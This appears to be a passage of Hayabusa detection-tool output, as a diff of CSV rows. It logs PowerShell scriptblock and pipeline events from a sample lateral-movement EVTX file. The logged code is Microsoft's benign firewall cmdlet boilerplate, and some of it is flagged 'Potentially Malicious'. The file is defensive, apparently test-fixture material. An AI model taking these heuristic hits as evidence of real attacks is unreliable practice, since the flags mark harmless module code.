[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.404 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 